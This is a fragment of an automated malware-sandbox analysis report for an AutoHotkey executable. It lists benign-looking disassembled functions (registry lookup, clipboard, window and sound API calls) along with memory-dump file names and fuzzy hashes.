                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID: An object.$Invalid value.
                                      • API String ID: 269201875-731773362
                                      • Opcode ID: 43c5130273e3b50bcf858397e4e1b643dfddc0baefce76be0c4493b34f4c96b1
                                      • Instruction ID: 9951c2e04d630b0db94df0ec7473f3ecfde6cc0f8c61dc40ddec4f426a87d1f4
                                      • Opcode Fuzzy Hash: 43c5130273e3b50bcf858397e4e1b643dfddc0baefce76be0c4493b34f4c96b1
                                      • Instruction Fuzzy Hash: A211AC70504B815BC731DF28D008B97BBE0AF55314F088E5EE0D68B791C3A8FA89CB96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004814F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegQueryValueExW.ADVAPI32(?,Layout File,00000000,00000000), ref: 00481508
                                      • RegCloseKey.ADVAPI32(00000000,?,Layout File,00000000,00000000), ref: 00481513
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CloseQueryValue
                                      • String ID: Layout File
                                      • API String ID: 3356406503-1055935358
                                      • Opcode ID: 78f30aa957dddf8067f314ef7a1daf016dab6a80fef24d3b39fa77404847fce2
                                      • Instruction ID: 4cb2bb99f9f12cc88d4c308a13ed4318a889be12cbef2e7636e31a1c10d332f1
                                      • Opcode Fuzzy Hash: 78f30aa957dddf8067f314ef7a1daf016dab6a80fef24d3b39fa77404847fce2
                                      • Instruction Fuzzy Hash: B90144B0214601AAD724EF69D88471BB7E8EF98350F104C2FE487C32A0E77498818759
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044B788 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                      Download Yara Rule
                                      APIs
                                      • mciSendStringW.WINMM(status AHK_PlayMe mode,?,00000208,00000000), ref: 0044B7EC
                                      • mciSendStringW.WINMM(close AHK_PlayMe,00000000,00000000,00000000), ref: 0044B813
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: SendString
                                      • String ID: status AHK_PlayMe mode$stopped
                                      • API String ID: 890592661-3192028569
                                      • Opcode ID: d79109f9da8f7a02a214fd08ee76e48582b8cd1eb4115f964b35b508fb7cb5ec
                                      • Instruction ID: 0174611f71dcfae99c37b15dba9e23276e2012e44b48fb816364da9649d55bf2
                                      • Opcode Fuzzy Hash: d79109f9da8f7a02a214fd08ee76e48582b8cd1eb4115f964b35b508fb7cb5ec
                                      • Instruction Fuzzy Hash: D1F0F62564030645FA20AB10CC82BF77362EFF0B58F44043FEA445B291F36AD589C2EA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00449321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00449337
                                        • Part of subcall function 0049A18D: RtlFreeHeap.NTDLL(00000000,00000000,?,0049DF53,00000000,?,0049F727,?,0047FFCE), ref: 0049A1A3
                                        • Part of subcall function 0049A18D: GetLastError.KERNEL32(00000000,?,0049DF53,00000000,?,0049F727,?,0047FFCE), ref: 0049A1B5
                                      • _malloc.LIBCMT ref: 00449346
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: ErrorFreeHeapLast_free_malloc
                                      • String ID: Out of memory.
                                      • API String ID: 1323848136-4087320997
                                      • Opcode ID: dd0031c7b7fd3af9da1d7b6eeb367ef518b3abc0634d045907c2d6f1a48bae3a
                                      • Instruction ID: db5275d4cf7d323973f8cb355723b087375f29b9c77ac0f5b2352752b8431e50
                                      • Opcode Fuzzy Hash: dd0031c7b7fd3af9da1d7b6eeb367ef518b3abc0634d045907c2d6f1a48bae3a
                                      • Instruction Fuzzy Hash: 1F018F606482008BA310DF15C085A6BF7E5BF9A304F29845BE8864B392D679CC06A79F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00474670 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetPropW.USER32(?,ahk_dlg), ref: 0047467D
                                        • Part of subcall function 00474090: GetClientRect.USER32(?,?), ref: 004740A0
                                        • Part of subcall function 00474090: GetWindowLongW.USER32(?,000000F0), ref: 004740A9
                                        • Part of subcall function 00474090: SendMessageW.USER32(?,0000130A,00000000,?), ref: 004740CC
                                        • Part of subcall function 00474090: SendMessageW.USER32(?,0000132C,00000000,00000000), ref: 004740D8
                                        • Part of subcall function 00474090: MapWindowPoints.USER32(?,?,?,00000002), ref: 00474144
                                      • MoveWindow.USER32(00000000,?,?,?,?,00000001,?,?), ref: 004746B3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Window$MessageSend$ClientLongMovePointsPropRect
                                      • String ID: ahk_dlg
                                      • API String ID: 1880356802-2093416220
                                      • Opcode ID: 3ec4515c7ba7bf5f41e3fe3a98a2765d5bc985019ff9f1c11a9f93aca9c388ec
                                      • Instruction ID: 5b79c277d9c139bdfc66c1d45455f7a2d468c23251e53f03ce58e45ab488d4dc
                                      • Opcode Fuzzy Hash: 3ec4515c7ba7bf5f41e3fe3a98a2765d5bc985019ff9f1c11a9f93aca9c388ec
                                      • Instruction Fuzzy Hash: EEF08275600101BFD200DB28DC45DBBBBEDEFC5750F00852DF94883215EA34EC0586AA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401060 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25clipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00401072
                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 0040107A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: AvailableClipboardFormat
                                      • String ID: <<>>
                                      • API String ID: 778505046-913080871
                                      • Opcode ID: 4a19efab0ca6584a156749920ab6cbbabaed7f2400ee8025b0f199901d499216
                                      • Instruction ID: 5fb3b3fdd82dd28380a9f92074f7879e06bc5db9abaeb92cf32bf7eb19360875
                                      • Opcode Fuzzy Hash: 4a19efab0ca6584a156749920ab6cbbabaed7f2400ee8025b0f199901d499216
                                      • Instruction Fuzzy Hash: 70E02621B0115182EBB0667DBE007972B98AB44760B01023BF8E8EB6E4D32CCC8902EC
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004052E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22clipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalUnlock.KERNEL32(00000000,00404F56,?,?,00401093), ref: 004052EF
                                      • CloseClipboard.USER32 ref: 004052FC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: ClipboardCloseGlobalUnlock
                                      • String ID: GlobalLock
                                      • API String ID: 3794156920-2848605275
                                      • Opcode ID: e7e38feda9dd96c934ed051bb25a13313b11dd829941e4039fbdcf45bb98ba71
                                      • Instruction ID: 647fa98da61160dc23ec2bf0c031abd0dda16366605727ad166e2ca1ea1bfed9
                                      • Opcode Fuzzy Hash: e7e38feda9dd96c934ed051bb25a13313b11dd829941e4039fbdcf45bb98ba71
                                      • Instruction Fuzzy Hash: B4E0E534400B02DBE7345F59D458397BAF4EF9470AFA4442FA88652BE0DBFC9888CE59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004333CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004333E2
                                      • PostMessageW.USER32(00000000), ref: 004333E9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: FindMessagePostWindow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 2578315405-2988720461
                                      • Opcode ID: 5dd1c4cfd29155914440fbc0c99e798e8682c963165954114220cf8ec9ac1bcd
                                      • Instruction ID: 7868fb60b2e8bce114be116589b4d80ef0627ffa0cce05ad27913bcc9cdab135
                                      • Opcode Fuzzy Hash: 5dd1c4cfd29155914440fbc0c99e798e8682c963165954114220cf8ec9ac1bcd
                                      • Instruction Fuzzy Hash: E1E08C30F84200BBE5082220DC4BF9436411B0A728F340222F622AE2F1C6FE9442462A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00433416 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00433429
                                      • PostMessageW.USER32(00000000), ref: 00433430
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: FindMessagePostWindow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 2578315405-2988720461
                                      • Opcode ID: ae9f158219554506275c2422ee12b237d66fcdf0c638bb5b48c1e5c6da8317f2
                                      • Instruction ID: 3e0eb104794c611f6d2b9541cbfbbb479c7365e6a2e8b9b232b6b8b1d830c8f9
                                      • Opcode Fuzzy Hash: ae9f158219554506275c2422ee12b237d66fcdf0c638bb5b48c1e5c6da8317f2
                                      • Instruction Fuzzy Hash: 56E08C30F84200BBE50823209C4BF8436412B0A728F380222F611AE2F5C2FED482462E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044F420 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemDefaultUILanguage.KERNEL32 ref: 0044F429
                                      • __swprintf.LIBCMT ref: 0044F439
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: DefaultLanguageSystem__swprintf
                                      • String ID: %04hX
                                      • API String ID: 1359733045-3571374829
                                      • Opcode ID: d7dfeee0e7d40381a36eda821fdb6975b8c3b13349a131750efeef8b9414e9bb
                                      • Instruction ID: 0343d19ab8ea9d7c74cc6f42205d099c5a35b942ecd3390b69a39985a0adad91
                                      • Opcode Fuzzy Hash: d7dfeee0e7d40381a36eda821fdb6975b8c3b13349a131750efeef8b9414e9bb
                                      • Instruction Fuzzy Hash: 99C0127691213017D91126147842BBB7A588B85714F494067FC40A6241C5288C5195FE
                                      Uniqueness

                                      Uniqueness Score: -1.00%